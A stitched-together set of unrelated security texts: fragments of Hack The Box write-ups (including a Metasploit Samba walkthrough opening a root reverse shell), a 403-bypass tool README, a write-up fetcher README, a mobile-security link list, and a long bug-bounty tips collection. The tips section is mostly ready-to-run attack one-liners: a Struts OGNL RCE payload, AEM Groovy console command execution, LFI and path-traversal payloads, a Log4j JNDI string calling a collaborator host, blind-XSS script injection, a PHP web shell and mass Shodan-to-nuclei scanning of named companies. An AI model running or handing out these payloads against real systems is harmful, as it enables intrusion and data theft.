mqueue on /dev/mqueue type mqueue (rw,relatime)
hugetlbfs on /dev/hugepages type hugetlbfs (rw,relatime)
tmpfs on /tmp type tmpfs (rw,nosuid,nodev,relatime)
/dev/sdb on /media/usbstick type ext4 (ro,nosuid,nodev,noexec,relatime,data=ordered)
tmpfs on /run/user/999 type tmpfs (rw,nosuid,nodev,relatime,size=51200k,mode=700,uid=999,gid=997)
tmpfs on /run/user/1000 type tmpfs (rw,nosuid,nodev,relatime,size=51200k,mode=700,uid=1000,gid=1000)
```
* We can see a `/dev/sdb` mounted on `/media/usbstick`
* Here, there is a file called `damnit.txt` with the following text:
```
Do you know if there is any way to get them back?
-James
```
* To do the forensics locally, we can first turn the device into an image with `dd if=/dev/sdb/ -of=/dev/usb.image`
* We can then download this with `python3 -m http.server 8080` remotely and `wget http://10.10.10.48:8080/usb.image` locally
* first tried to cat out the device with `strings usb.image | egrep [a-f0-9]{32}`
* This gives us the strings on the block device, which gives us the root flag: `3d3e483143ff12ec505d026fa13e020b`
|
```
__ __ __
/ /_ __ ______ / // / _ ___ __
/ __ \/ / / / __ \/ // /_| |/_/ |/_/
/ /_/ / /_/ / /_/ /__ __/> <_> <
/_.___/\__, / .___/ /_/ /_/|_/_/|_|
/____/_/
```
40X bypasser in Go. Methods from #bugbountytips, headers, verb tampering, user agents and more.
**Usage:**
```
byp4xx <cURL or byp4xx options> <URL or file>
Some cURL options you may use as example:
-L follow redirections (30X responses)
-x <ip>:<port> to set a proxy
-m <seconds> to set a timeout
-H for new headers. Escape double quotes.
-d for data in the POST requests body
-...
Built-in options:
--all Verbose mode (by default only 2xx and 3xx codes will be prompted)
-t or --thread Set the maximum threads. Rate limit disabled when threads are enabled. Use carefully.
--rate Set the maximum reqs/sec. Only one thread enforced, for low rate limits. (5 reqs/sec by default)
-xV Exclude verb tampering
-xH Exclude headers
-xUA Exclude User-Agents
-xX Exclude extensions
-xD Exclude default creds
-xS Exclude CaSe SeNsiTiVe
-xM Exclude middle paths
-xE Exclude end paths
-xB Exclude #bugbountytips
```
**Examples:**
Regular usage:
```
byp4xx http://localhost/test
```
Avoid default creds if the response is not 401:
```
byp4xx -xD http://localhost/test
```
Avoid end paths and extensions if the url ends with /:
```
byp4xx -xE -xX http://localhost/test
```
Set 2 seconds timeout, follow redirections and use proxy
```
byp4xx -m 2 -L -x 127.0.0.1:8080 http://localhost/test
```
Custom headers, you should escape double quotes:
```
byp4xx -H \"Authorization: Bearer <JWT>\" http://localhost/test
```
**Features:**
- Multiple HTTP verbs/methods
- Multiple methods mentioned in #bugbountytips
- Multiple headers: Referer, X-Custom-IP-Authorization...
- Accepts any cURL option
- Based on Seclist
- UserAgents
- Extensions
- Default credentials
**[Buy me a coffee... or a pizza! Stay cool! ^_^](https://buymeacoffee.com/lobuhi)**
|
# HackTheBox WriteUps Auto-Fetcher
Automated Script with [Github actions](https://github.com/apps/github-actions) to fetch official [HackTheBox](https://www.hackthebox.com/) write-ups after the box is **retired**.
> **Warning**
> Please create a private repo to store the write-ups using `Use this template` button.
### Setup
1. Visit https://app.hackthebox.com/profile/settings
2. Scroll down to `App Tokens`.
3. Click on `CREATE APP TOKEN`.
4. Add `TOKEN NAME` = `FetcherActionsPrivate`.
5. Set `EXPIRES IN` = `6 Months` (or whicher you find suitable).
> ![](.github/workflows/images/create-app-token.png)
6. Copy the generated `APP TOKEN` and save it somewhere **safe**.
> ![](.github/workflows/images/generated-token.png)
7. Add this token to `Actions secrets` at `https://github.com/<username>/htb-writeups-fetcher/settings/secrets/actions`
> ![](.github/workflows/images/token-added-to-github-secrets.png)
8. **Done**! Now on every Monday, 00:00 GMT this script will run which will pull the Official HTB write-ups for you and put it in [files](/files/) directory.
|
Thanks to @ibra0963 for collecting the tips.
https://twitter.com/Alra3ees/status/1419058927422017540
The easiest RCE i have found on zerocpter so far:-
```
httpx -l hosts.txt -path "/_fragment?_path=_controller=phpcredits&flag=-1" -threads 100 -random-agent -x GET -tech-detect -status-code -follow-redirects -title -mc 200 -match-regex "PHP Credits"
``
Save this symfony endpoint in your wordlist and run httpx:-
```
/app_dev.php/1'%20%22 -> SQLi
sqlmap -u "https://domain/app_dev.php/1*" --level 4 --risk 2 --dbms="MySQL" --random-agent --force-ssl --hostname --dbs
/app_dev.php -> php info
/_fragment?_path=_controller=phpcredits&flag=-1 -> RCE
httpx -l hosts.txt -path "/_fragment?_path=_controller=phpcredits&flag=-1" -threads 100 -random-agent -x GET -tech-detect -status-code -follow-redirects -title -mc 200 -match-regex "PHP Credits"
Tip: error -> try to put the -path value in " "
[https://www.ambionics.io/blog/symfony-secret-fragment]
```
Little gift my friend On Symfony try these end:
```
/app_dev.php/1'%20"
SQL Injection 90%
Should reserve an error
```
Easy 4 digits:
```
-Find SharePoint Exposed Web Services[?wsdl] File
-Search for [DataServices.asmx]
-Try to use the requests to get data .
-Scan for SQL Injection
```
Search for company IPs on shodan and scan them via nuclei:-
```
Install shodan and Add your api key
shodan init <api key>
Run:-
shodan search org:"google" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | httprobe | nuclei -c 100 -t nuclei-templates/
```
Easy money on your free time:-
```
Download:- https://github.com/joaomatosf/jexboss
git clone https://github.com/joaomatosf/jexboss
cd jexboss
pip3 install -r requires.txt
Run:- python3 jexboss.py -mode file-scan -file hosts.txt -out report_file_scan.log
Good luck!
```
Search for company ips on shodan and scan them via nuclei:-
```
1:- Install shodan pip3 install shodan
2:- Add your api key shodan init <api key>
3:- Install httprobe and nuclei
Run:-
shodan search org:"google" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | httprobe | nuclei -c 100 -t /root/nuclei-templates/
```
Scan Apple ASN for vulnerabilities and leave no port:-
[https://github.com/emadshanab/Scan-Apple-ASN-for-vulnerabilities-and-leave-no-port]
A complete guide to dir brute force,admin panel and API endpoints:-
https://github.com/emadshanab/Acomplete-guide-to-dir-brute-force-admin-panel-and-API-endpoints
``
ppfuzz v1 released! Now, if it's indeed vulnerable:
it'll fingerprinting the script gadgets used and then display additional payload info that could potentially escalate its impact to XSS, bypass/cookie injection. Bump now! — [https://github.com/dwisiswant0/ppfuzz]
``
In your recon process you can find a critical vulnerability like RCE very easy if you have found this dir
```
/sm/login/loginpagecontentgrabber.do:-
```
I have found a Remote Command Execution ( Apache Struts S2-016) on one of bugcrowd private programs and earned the full bounty of $3000.
```
Just use this oneliner to test for Struts S2-016 on all the hosts.
You just need httpx to run this test.
[https://github.com/projectdiscovery/httpx](https://github.com/projectdiscovery/httpx?fbclid=IwAR0iWG0kIwliGEqFCKpEv864bjk-O_BQ-1QB7VWfpwykiQpapViBmSX3FJ4)
httpx -l hosts.txt -path /sm/login/loginpagecontentgrabber.do -threads 100 -random-agent -x GET,POST,PUT -title -tech-detect -status-code -follow-redirects -title -mc 200
```
If you get /sm/login/loginpagecontentgrabber.do just inject this line on the url:-
```
?redirect%3a${%23a%3d(new+java.lang.ProcessBuilder(new+java.lang.String[]{"cat","/etc/passwd"})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew+java.io.InputStreamReader(%23b),%23d%3dnew+java.io.BufferedReader(%23c),%23e%3dnew+char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
```
If you see the etc/passwd on the browser then congratulations you get a RCE vulnerability and you will earn the full bounty.
Ref:-
[https://cwiki.apache.org/confluence/display/WW/S2-016](https://cwiki.apache.org/confluence/display/WW/S2-016?fbclid=IwAR3v1OVR0-ID74MbVZ0aRbFUXwIJdAH_kTyL91Ujsckc4ZDvtnylr6QBgJE)
PS:- Work smarter not harder.
[Multi_tools_subdomains]
(https://github.com/emadshanab/Multi_tools_subdomains)
Add /api/.env to wordlist,maybe you will have access to dotenv file environment that leading to exposing symfony APP_SECRET and MAILER_DSN password
httpx:-
```
httpx -l hosts -path /api/.env -threads 100 -random-agent -x GET,POST -tech-detect -status-code -follow-redirects -title -match-regex "APP_SECRET"
```
Add /dbconsole/ to wordlist,
maybe you will access to Grails database admin console (H2 Console) like i did today.
``
If you are free,get some easy monay
aem querybuilder internal path read
- Find AEM:-
[https://github.com/0ang3el/aem-hacker]
```
python3 aem_discoverer.py --file urls.txt -> urls.txt contains subdomain
```
- scan dir:-
[https://github.com/Raz0r/aemscan]
aemscan aem_url
- wordlist:-
[https://github.com/emadshanab/Adobe-Experience-Manager]
```
nuclei -l hosts -tags AEM -t /root/nuclei-templates
```
- Quick test all the hosts for Adobe Experience Manager (AEM) paths via
Wordlist: https://github.com/emadshanab/Adobe-Experience-Manager
```
httpx -l allhosts -paths /root/aem-paths.txt -threads 100 -random-agent -x GET,POST -tech-detect -status-code -follow-redirects -title -mc 200
```
Quick test all the hosts for LFI via @pdiscoveryio httpx:-``
[https://github.com/hussein98d/LFI-files]
```
httpx -l allhosts -paths /root/list.txt -threads 100 -random-agent -x GET,POST,PUT -title -tech-detect -status-code -follow-redirects -title -mc 200 -match-regex "root:[x*]:0:0:"
```
From archive:-
```
cat allhosts | gauplus -t 100 --random-agent -o result.txt ;cat result.txt| gf lfi >> lfi.txt ; httpx -l lfi.txt -paths /root/lfi_wordlist.txt -threads 100 -random-agent -x GET,POST,PUT -tech-detect -status-code -follow-redirects -title -mc 200 -match-regex "root:[x*]:0:0:"
```
Blind XSS at scale
```
cat domains.txt | waybackurls | httpx -H "User-Agent: \"><script src=$YOUR_XSS_HUNTER></script>"
```
```
site:target.com inurl:"contact" | inurl:"contact-us" | inurl:"contactus" | inurl:"contcat_us" | inurl:"contact_form" | inurl:"contact-form"
```
fill html code in username and xsshunter in the message
AEM:
/api.json
/etc/groovyconsole.html -> RCE with the below code
```
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'cat /etc/passwd'.execute()
proc.consumProcessOutput(sout,serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
```
For XSS:
Content-Type:application/json -> Content-Type:text/xss
LFI at SCALE:
```
cat hosts | gau | gf lfi | httpx -paths lfi_wordlist.txt -threads 100 -random-agent -x GET,POST -tech-detect -status-code -follow-redirects -mc 200 -mr "root:[x*]:0:0:"
```
```
cat hosts | httpx -nc -t 300 -p 80,443,8080,8443,8888,8088 -path "/jobmanager/logs/..%252f..%252f..%252f......%252f..%252fetc%252fpasswd" -mr "root:x" -silent
```
```
cat hosts | httpx -nc -t 250 -p 80,443,8080,8443,4443,8888 -path "///////../../../etc/passwd" -mr "root:x" | anew myP1s.txt
```
VMware vCenter (7.0.2.00100):
```
cat target.txt| while read host do;do curl --insecure --path-as-is -s "$host/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd"| grep "root:x" && echo "$host Vulnerable";done
```
CVE-2021-41277:
```
cat targets.txt| while read host do;do curl --silent --insecure --path-as-is "$host/api/geojson?url=file:///etc/passwd" | grep -qs "root:x" && echo "$host \033[0;31m Vulnerable";done
```
```
httpx -l IPlist.txt -follow-redirects -title -path /api/geojson?url=file:///etc/passwd -match-string "root:x:0:0"
```
```
ffuf -c -w live.txt -u FUZZ/api/geojson?url=file:///etc/passwd -mr "root:x:0" -t 500
```
```
echo "[http://site.com](https://t.co/6jKKc48dKf)" | httpx | nuclei -t nuclei-templates/cves/2021/CVE-2021-41277.yaml
```
Payloads:
```
/v1/docs//..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\/etc/passwd
```
Find PUT method enable:
```
cat targets.txt | assetfinder -subs-only | httpx -silent -p 80,443,8080,8443,9000,9001,9002,9003 -nc | nuclei -t severity high -silent | tee -a BugsFound.txt
```
Find XSS:
```
cat hosts | httpx -nc -t 300 -p 80,443,8080,8443 -silent -path "/?name={{this.constructor.constructor('alert(\"foo\")')()}}" -mr "name={{this.constructor.constructor('alert("
```
```
cat hosts.txt | ffuf -w - -u "FUZZ/sign-in?next=javascript:alert(1);" -mr "javascript:alert(1)"
```
```
waybackurls [http://testphp.vulnweb.com](https://t.co/94lROe3O9p) | urldedupe -qs | bhedak '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)" | egrep -v 'Not'
```
```
add http://brutelogic.com.br/poc.svg to the end of any endpoint
```
```
Change Content-type to image/svg-xml and add your payload
```
```
waybackurls target.com | grep '=' |qsreplace '"><script>alert(1)</script>' | while read host do ; do curl -s --path-as-is --insecure "$host" | grep -qs "<script>alert(1)</script>" && echo "$host \033[0;31m" Vulnerable;done
```
Find File read (CVE-2021-26085):
```
cat hosts | httpx -nc -t 300 -p 80,443,8080,8443 -silent -path "/s/123cfx/_/;/WEB-INF/classes/seraph-config.xml" -mc 200
```
Find Jenkins Instance with Shodan:
```
ssl:target 200 http.title:"Dashboard [Jenkins]"
payload: "ls /".execute().text
```
rConfig 3.9.6 Shell Upload:
```
1. Login the rConfig application with your credentials.
2. request POST with payload <?php echo $_GET["cmd"];?>
3. http(s)://<SERVER>/images/vendor/file.php?cmd=id The `id` command will execute on server.
```
Find Information Disclosure:
```
ssl.cert.subject.CN:"*.target.com" 200 http.title:"index"
```
```
cat hosts.txt | httpx -c -silent -path "/wp-content/mysql.sql" -mc 200 -t 250 -p 80,443,8080,8443 | anew myP1s.txt
```
VERY IMPORTANT TOOLS:
https://github.com/ameenmaali/urldedupe
https://github.com/six2dez/reconftw
https://github.com/Sh1Yo/x8
https://github.com/luke-goddard/LFI-Fuzzer-Burp-Suite
Nuclei-Templates:
https://github.com/emadshanab/Nuclei-Templates-Collection
Crt.sh - httpx - nuclei:
crt.sh target.com | httpx | nuclei
One-liner-bug-bounty:
https://github.com/KingOfBugbounty/KingOfBugBountyTips/
https://github.com/Krishnathakur063/OneLiner_BugBounty
https://github.com/0xlittleboy/One-Liner-Scripts
https://github.com/notmarshmllow/Bug-Hunting-With-Bash
Bug Bounty Methodology:
https://github.com/ManasHarsh/Bug-bounty-methodology
https://github.com/JakobTheDev/bug-bounty
https://github.com/blackhatethicalhacking/bugbountytools-methodology
https://github.com/0x4rk0/Methodology
https://github.com/BugBountyResources/Resources
https://github.com/ajuachu94/Bug-Bounty-Methodology
https://github.com/h33raj/Bug-Bounty-Methodology
https://github.com/naufalan/Web-App-Methodology
https://github.com/oneplus-x/The-Bug-Hunters-Methodology
Mindmaps:
https://gowthams.gitbook.io/bughunter-handbook/mindmaps
https://github.com/imran-parray/Mind-Maps
https://awesomeopensource.com/projects/mindmap
https://github.com/5bhuv4n35h/pentestmindmap
https://github.com/topics/mindmap
Find SSRF:
1:- Download https://github.com/lutfumertceylan/top25-parameter/blob/master/ssrf-parameters.txt
2:- Add http://brutelogic.com.br/poc.svg on {target}
3:- Run httpx: httpx -paths ssrf-parameters.txt -threads 200 -o ssrf.txt
4:- Screenshot the result: gowitness file -f ssrf.txt
-> If the website is vulnerabile it will make a request to the svg.poc and rendering the domain name. SSRF to XSS
```
findomain -t DOMAIN -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace http://YOUR.burpcollaborator.net
```
SSRF to RCE:
https://twitter.com/e11i0t_4lders0n/status/1473640106741284866
Log4j - RCE: (Search for bypasses)
```
cat hosts.txt | sed 's/https\?:\/\///' | xargs -I {} echo '{}/${jndi:ldap://{}.attacker.burpcollaborator.net}' >> log4j.txt
httpx -l log4j.txt
```
Look for callbacks in your server. It should be VICTIM.ATTACKER.burpcollab
Find hidden params in javascript files
```
assetfinder target.com | gau | egrep -v '(.css|.svg)' | while read url; do vars=$(curl -s [$url](https://twitter.com/search?q=%24url&src=cashtag_click) | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars"
```
```
cat subdomains.txt | gauplus -subs -t 100 -random-agent | sort -u --version-sort | httpx -silent -threads 2000 | grep -Eiv '(.eot|.jpg|.jpeg|.gif|.css|.tif|.tiff|.png|.ttf|.otf|.woff|.woff2|.ico|.svg|.txt|.pdf)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -Eiv '\.js$|([^.]+)\.js|([^.]+)\.js\.[0-9]+$|([^.]+)\.js[0-9]+$|([^.]+)\.js[a-z][A-Z][0-9]+$' | sed 's/.*/&=FUZZ/g'); echo -e "\e[1;33m$url\e[1;32m$vars";done
```
SQLi:
RCE:
```
sqlmap -r request.txt --force-ssl -p pramater --level 5 --risk 2 -dbms="Microsoft SQL Server" --os-cmd="ping http://your.burpcollaborator.net"
```
Github Recon:
take a look and check:
target.okta.com password
target.onelogin.com password
target.service-now password
target.atlassian.net password
target.jfrog.io password
target.sharepoint.com password
Zabbie dashboard without authentication:
```
/zabbix/zabbix.php?action=dashboard.list
```
RCE:
https://twitter.com/Alra3ees/status/1416185619336814596:
```
httpx -l hosts.txt -path /sm/login/loginpagecontentgrabber.do -threads 100 -random-agent -x GET -title -tech-detect -status-code -follow-redirects -title -mc 200
```
5min admin panel accessed payLoda:
```
cat urls.txt | qsreplace "?admin=true" | gau | phpgcc | anew | kxss | awk -v -q txt | sed 's/http/\nhttp/g' | grep ^http | sed 's/\(^http[^ <]*\)\(.*\)/\1/g' | grep -vi -e dalfox -e lElLxtainw| sort -u | waybackurls
```
postMessage() Vulnerabilities
https://twitter.com/Alra3ees/status/1527029184517885954
SpringScan Burp detection plugin:-
https://twitter.com/Alra3ees/status/1525827005564039171
JSON Injection:
https://twitter.com/M0Hacks/status/1524313916368642050
More Subs:
https://twitter.com/Alra3ees/status/1426674895803531266
Other Accounts:
https://twitter.com/_bughunter
https://twitter.com/YogoshaOfficial
https://twitter.com/wugeej
|
# Lame
URL: https://app.hackthebox.com/machines/Lame
Level: Easy
Date 29 May 2020
## Walkthrough
- [Enumeration](#enumeration)
# Enumeration
## NMAP
We found SAMBA service.
We search in `msfconsole`:
```
msf5 exploit(unix/misc/distcc_exec) > search samba 3.0.20
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/http/wp_easycart_privilege_escalation 2015-02-25 normal Yes WordPress WP EasyCart Plugin Privilege Escalation
1 auxiliary/admin/smb/samba_symlink_traversal normal No Samba Symlink Directory Traversal
2 auxiliary/dos/samba/lsa_addprivs_heap normal No Samba lsa_io_privilege_set Heap Overflow
3 auxiliary/dos/samba/lsa_transnames_heap normal No Samba lsa_io_trans_names Heap Overflow
4 auxiliary/dos/samba/read_nttrans_ea_list normal No Samba read_nttrans_ea_list Integer Overflow
5 auxiliary/scanner/rsync/modules_list normal No List Rsync Modules
6 auxiliary/scanner/smb/smb_uninit_cred normal Yes Samba _netr_ServerPasswordSet Uninitialized Credential State
7 exploit/freebsd/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (*BSD x86)
8 exploit/linux/samba/chain_reply 2010-06-16 good No Samba chain_reply Memory Corruption (Linux x86)
9 exploit/linux/samba/is_known_pipename 2017-03-24 excellent Yes Samba is_known_pipename() Arbitrary Module Load
10 exploit/linux/samba/lsa_transnames_heap 2007-05-14 good Yes Samba lsa_io_trans_names Heap Overflow
11 exploit/linux/samba/setinfopolicy_heap 2012-04-10 normal Yes Samba SetInformationPolicy AuditEventsInfo Heap Overflow
12 exploit/linux/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Linux x86)
13 exploit/multi/samba/nttrans 2003-04-07 average No Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
14 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
15 exploit/osx/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow
16 exploit/osx/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Mac OS X PPC)
17 exploit/solaris/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow
18 exploit/solaris/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Solaris SPARC)
19 exploit/unix/http/quest_kace_systems_management_rce 2018-05-31 excellent Yes Quest KACE Systems Management Command Injection
20 exploit/unix/misc/distcc_exec 2002-02-01 excellent Yes DistCC Daemon Command Execution
21 exploit/unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Yes Citrix Access Gateway Command Execution
22 exploit/windows/fileformat/ms14_060_sandworm 2014-10-14 excellent No MS14-060 Microsoft Windows OLE Package Manager Code Execution
23 exploit/windows/http/sambar6_search_results 2003-06-21 normal Yes Sambar 6 Search Results Buffer Overflow
24 exploit/windows/license/calicclnt_getconfig 2005-03-02 average No Computer Associates License Client GETCONFIG Overflow
25 exploit/windows/smb/group_policy_startup 2015-01-26 manual No Group Policy Script Execution From Shared Resource
26 post/linux/gather/enum_configs normal No Linux Gather Configurations
```
We try `exploit/multi/samba/usermap_script`:
```
msf5 exploit(unix/misc/distcc_exec) > use exploit/multi/samba/usermap_script
msf5 exploit(multi/samba/usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 139 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(multi/samba/usermap_script) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf5 exploit(multi/samba/usermap_script) > run
[*] Started reverse TCP double handler on 10.10.14.33:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 807hbG2JR8cHz7Qj;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "807hbG2JR8cHz7Qj\r\n"
[*] Matching...
[*] A is input...
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/statement_cache.rb:90: warning: Capturing the given block using Proc.new is deprecated; use `&block` instead
[*] Command shell session 2 opened (10.10.14.33:4444 -> 10.10.10.3:59002) at 2020-06-09 23:25:40 +0200
msf5 exploit(unix/misc/distcc_exec) > use exploit/multi/samba/usermap_script
msf5 exploit(multi/samba/usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 139 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(multi/samba/usermap_script) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf5 exploit(multi/samba/usermap_script) > run
[*] Started reverse TCP double handler on 10.10.14.33:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 807hbG2JR8cHz7Qj;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "807hbG2JR8cHz7Qj\r\n"
[*] Matching...
[*] A is input...
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/statement_cache.rb:90: warning: Capturing the given block using Proc.new is deprecated; use `&block` instead
[*] Command shell session 2 opened (10.10.14.33:4444 -> 10.10.10.3:59002) at 2020-06-09 23:25:40 +0200
```
We are already root:
```
id
uid=0(root) gid=0(root)
python -c 'import pty; pty.spawn("/bin/bash")'
root@lame:/#
root@lame:/# cd root
root@lame:/root# cat root.txt
cat root.txt
92caac3be140ef409e45721348a4e9df
```
|
# awesome-mobile-security ![awesome](https://awesome.re/badge.svg)
Maintained by [@vaib25vicky](https://twitter.com/vaib25vicky) with contributions from the security and developer communities.
## Android
### General - Blogs, Papers, How To's
* [Android: Gaining access to arbitrary* Content Providers](https://blog.oversecured.com/Gaining-access-to-arbitrary-Content-Providers/)
* [Evernote: Universal-XSS, theft of all cookies from all sites, and more](https://blog.oversecured.com/Evernote-Universal-XSS-theft-of-all-cookies-from-all-sites-and-more/)
* [Interception of Android implicit intents](https://blog.oversecured.com/Interception-of-Android-implicit-intents/)
* [TikTok: three persistent arbitrary code executions and one theft of arbitrary files](https://blog.oversecured.com/Oversecured-detects-dangerous-vulnerabilities-in-the-TikTok-Android-app/)
* [Persistent arbitrary code execution in Android's Google Play Core Library: details, explanation and the PoC - CVE-2020-8913](https://blog.oversecured.com/Oversecured-automatically-discovers-persistent-code-execution-in-the-Google-Play-Core-Library/)
* [Android: Access to app protected components](https://blog.oversecured.com/Android-Access-to-app-protected-components/)
* [Android: arbitrary code execution via third-party package contexts](https://blog.oversecured.com/Android-arbitrary-code-execution-via-third-party-package-contexts/)
* [Android Pentesting Labs - Step by Step guide for beginners](https://medium.com/bugbountywriteup/android-pentesting-lab-4a6fe1a1d2e0)
* [An Android Hacking Primer](https://medium.com/swlh/an-android-hacking-primer-3390fef4e6a0)
* [Secure an Android Device](https://source.android.com/security)
* [Security tips](https://developer.android.com/training/articles/security-tips)
* [OWASP Mobile Security Testing Guide](https://www.owasp.org/index.php/OWASP_Mobile_Security_Testing_Guide)
* [Security Testing for Android Cross Platform Application](https://3xpl01tc0d3r.blogspot.com/2019/09/security-testing-for-android-app-part1.html)
* [Dive deep into Android Application Security](https://blog.0daylabs.com/2019/09/18/deep-dive-into-Android-security/)
* [Pentesting Android Apps Using Frida](https://www.notsosecure.com/pentesting-android-apps-using-frida/)
* [Mobile Security Testing Guide](https://mobile-security.gitbook.io/mobile-security-testing-guide/)
* [Mobile Application Penetration Testing Cheat Sheet](https://github.com/sh4hin/MobileApp-Pentest-Cheatsheet)
* [Android Applications Reversing 101](https://www.evilsocket.net/2017/04/27/Android-Applications-Reversing-101/#.WQND0G3TTOM.reddit)
* [Android Security Guidelines](https://developer.box.com/en/guides/security/)
* [Android WebView Vulnerabilities](https://pentestlab.blog/2017/02/12/android-webview-vulnerabilities/)
* [OWASP Mobile Top 10](https://www.owasp.org/index.php/OWASP_Mobile_Top_10)
* [Practical Android Phone Forensics](https://resources.infosecinstitute.com/practical-android-phone-forensics/)
* [Mobile Reverse Engineering Unleashed](http://www.vantagepoint.sg/blog/83-mobile-reverse-engineering-unleashed)
* [Android Root Detection Bypass Using Objection and Frida Scripts](https://medium.com/@GowthamR1/android-root-detection-bypass-using-objection-and-frida-scripts-d681d30659a7)
* [quark-engine - An Obfuscation-Neglect Android Malware Scoring System](https://github.com/quark-engine/quark-engine)
* [Root Detection Bypass By Manual Code Manipulation.](https://medium.com/@sarang6489/root-detection-bypass-by-manual-code-manipulation-5478858f4ad1)
* [Application and Network Usage in Android](https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1528491463.pdf)
* [GEOST BOTNET - the discovery story of a new Android banking trojan](http://public.avast.com/research/VB2019-Garcia-etal.pdf)
* [Mobile Pentesting With Frida](https://drive.google.com/file/d/1JccmMLi6YTnyRrp_rk6vzKrUX3oXK_Yw/view)
* [Magisk Systemless Root - Detection and Remediation](https://www.mobileiron.com/en/blog/magisk-android-rooting)
* [AndrODet: An adaptive Android obfuscation detector](https://arxiv.org/pdf/1910.06192.pdf)
* [Hands On Mobile API Security](https://hackernoon.com/hands-on-mobile-api-security-get-rid-of-client-secrets-a79f111b6844)
* [Zero to Hero - Mobile Application Testing - Android Platform](https://nileshsapariya.blogspot.com/2016/11/zero-to-hero-mobile-application-testing.html)
* [How to use FRIDA to bruteforce Secure Startup with FDE-encryption on a Samsung G935F running Android 8](https://github.com/Magpol/fridafde)
* [Android Malware Adventures](https://docs.google.com/presentation/d/1pYB522E71hXrp4m3fL3E3fnAaOIboJKqpbyE5gSsOes/edit)
* [AAPG - Android application penetration testing guide](https://nightowl131.github.io/AAPG/)
* [Bypassing Android Anti-Emulation](https://www.juanurs.com/Bypassing-Android-Anti-Emulation-Part-I/)
* [Bypassing Xamarin Certificate Pinning](https://www.gosecure.net/blog/2020/04/06/bypassing-xamarin-certificate-pinning-on-android/)
* [Configuring Burp Suite With Android Nougat](https://blog.ropnop.com/configuring-burp-suite-with-android-nougat/)
### Books
* [SEI CERT Android Secure Coding Standard](https://www.securecoding.cert.org/confluence/display/android/Android+Secure+Coding+Standard)
* [Android Security Internals](https://www.oreilly.com/library/view/android-security-internals/9781457185496/)
* [Android Cookbook](https://androidcookbook.com/)
* [Android Hacker's Handbook](https://www.amazon.com/Android-Hackers-Handbook-Joshua-Drake/dp/111860864X)
* [Android Security Cookbook](https://www.packtpub.com/in/application-development/android-security-cookbook)
* [The Mobile Application Hacker's Handbook](https://www.amazon.in/Mobile-Application-Hackers-Handbook-ebook/dp/B00TSA6KLG)
* [Android Malware and Analysis](https://www.oreilly.com/library/view/android-malware-and/9781482252200/)
* [Android Security: Attacks and Defenses](https://www.crcpress.com/Android-Security-Attacks-and-Defenses/Misra-Dubey/p/book/9780367380182)
### Courses
* [Learning-Android-Security](https://www.lynda.com/Android-tutorials/Learning-Android-Security/689762-2.html)
* [Mobile Application Security and Penetration Testing](https://www.elearnsecurity.com/course/mobile_application_security_and_penetration_testing/)
* [Advanced Android Development](https://developer.android.com/courses/advanced-training/overview)
* [Learn the art of mobile app development](https://www.edx.org/professional-certificate/harvardx-computer-science-and-mobile-apps)
* [Learning Android Malware Analysis](https://www.linkedin.com/learning/learning-android-malware-analysis)
* [Android App Reverse Engineering 101](https://maddiestone.github.io/AndroidAppRE/)
* [Android Pentesting for Beginners](https://manifestsecurity.com/android-application-security/)
### Tools
#### Static Analysis
* [Amandroid – A Static Analysis Framework](http://pag.arguslab.org/argus-saf)
* [Androwarn – Yet Another Static Code Analyzer](https://github.com/maaaaz/androwarn/)
* [APK Analyzer – Static and Virtual Analysis Tool](https://github.com/sonyxperiadev/ApkAnalyser)
* [APK Inspector – A Powerful GUI Tool](https://github.com/honeynet/apkinspector/)
